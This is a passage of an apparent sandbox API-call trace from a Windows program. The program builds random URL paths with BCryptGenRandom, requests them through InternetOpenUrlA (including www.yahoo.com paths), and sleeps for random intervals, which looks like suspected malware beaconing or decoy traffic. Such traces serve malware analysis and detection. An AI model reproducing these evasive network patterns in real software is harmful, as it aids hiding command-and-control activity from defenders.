lpString1=0x473770, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0243.593] lstrcatA (in: lpString1="\x04", lpString2="/odUpgdSlP37bhhr52rxx931bEy/j9mQrb33ofssOl7v2z2O0ubgliQDJD0s/qjsr3vefat2Zn8ecs8Ztyv9xMy1vdnazT27Ycgy/hxukhxgpxqybD7f32a0nzu/" | out: lpString1="\x04/odUpgdSlP37bhhr52rxx931bEy/j9mQrb33ofssOl7v2z2O0ubgliQDJD0s/qjsr3vefat2Zn8ecs8Ztyv9xMy1vdnazT27Ycgy/hxukhxgpxqybD7f32a0nzu/") returned="\x04/odUpgdSlP37bhhr52rxx931bEy/j9mQrb33ofssOl7v2z2O0ubgliQDJD0s/qjsr3vefat2Zn8ecs8Ztyv9xMy1vdnazT27Ycgy/hxukhxgpxqybD7f32a0nzu/" [0243.593] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0243.593] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/odUpgdSlP37bhhr52rxx931bEy/j9mQrb33ofssOl7v2z2O0ubgliQDJD0s/qjsr3vefat2Zn8ecs8Ztyv9xMy1vdnazT27Ycgy/hxukhxgpxqybD7f32a0nzu/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0243.593] GetProcessHeap () returned 0x440000 [0243.593] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0243.593] GetProcessHeap () returned 0x440000 [0243.593] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0243.594] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0243.594] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0243.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0243.594] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0243.594] Sleep (dwMilliseconds=0xed9f) [0243.754] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0243.755] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0243.755] GetProcessHeap () returned 0x440000 [0243.755] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5330 [0243.755] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0243.755] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5331, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4f5331) returned 0x0 [0243.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.762] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.762] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.762] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.763] GetProcessHeap () returned 0x440000 [0243.764] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0243.764] lstrcpyA (in: lpString1=0x4726f0, lpString2=">M\x95Is://www.yahoo.com" | out: lpString1=">M\x95Is://www.yahoo.com") returned=">M\x95Is://www.yahoo.com" [0243.764] lstrcatA (in: lpString1=">M\x95Is://www.yahoo.com", lpString2="/k3ua7ykiar6iWyhnq6YGdnf6ze7q63zrv34p6/" | out: lpString1=">M\x95Is://www.yahoo.com/k3ua7ykiar6iWyhnq6YGdnf6ze7q63zrv34p6/") returned=">M\x95Is://www.yahoo.com/k3ua7ykiar6iWyhnq6YGdnf6ze7q63zrv34p6/" [0243.764] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0243.764] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl=">M\x95Is://www.yahoo.com/k3ua7ykiar6iWyhnq6YGdnf6ze7q63zrv34p6/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0243.764] GetProcessHeap () returned 0x440000 [0243.764] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0243.764] GetProcessHeap () returned 0x440000 [0243.764] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5330 | out: hHeap=0x440000) returned 1 [0243.764] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0243.765] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0243.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0243.765] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0243.765] Sleep (dwMilliseconds=0x1bf60) [0243.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0243.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0243.942] GetProcessHeap () returned 0x440000 [0243.942] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02350 [0243.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0243.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02351, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a02351) returned 0x0 [0243.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0243.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0243.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0243.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02375, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a02375) returned 0x0 [0243.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0243.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0243.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0243.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0243.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, 